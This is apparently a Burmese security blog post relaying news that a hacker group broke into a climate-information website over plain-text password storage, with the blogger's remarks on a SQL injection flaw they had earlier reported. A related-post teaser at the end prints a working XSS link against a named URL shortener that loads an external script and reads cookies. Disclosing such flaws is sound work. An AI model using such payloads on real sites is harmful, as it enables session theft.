U Tun Lwin

Chiang Mai (Mizzima) – A Burmese hacker group that targets popular Burmese websites broke into the  Myanmar Climate Change Watch (MCCW) website created by noted meteorologist Dr. Tun Lwin.

The website provides free up-to-date information on climate changes and weather news in Burma.

The hackers, known as the Blink Hacker Group (BHG) , posted a notice on the website that said users’ passwords were kept in plain text format, which undermines user privacy, the group said.

They hacked the website first on March 11 and then posted the warning on the website on Thursday.

The warning directed the website owner to repair the flaw in storing passwords as soon as possible or otherwise ‘BHG would hack and destroy this website’.

More info

———

We informed that vulnerability since last year : critical SQL injection (vulnerability) on Myanmar Climate Change Watch

I don’t know why they hack this kind of website, for revenge ? for promote themselves?  for advertise their news? ;; don’t know at all! Whatever and whoever they are, you should take care your site sand fix as soon as possible when you got alerted security weakness. 🙂

 

 

Explore More

Firewall: Shut Out the Hackers

This book discusses many of the security tools you can use to defend your computer against digital threats. An antivirus program and anti-spyware programs are critical; however, the third key

Error Messages

Error Messages Overview Think about these questions. * Why are Error Conditions and Error Messages a security problem? * What’s wrong with error conditions? * Wouldn’t an administrator want the

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type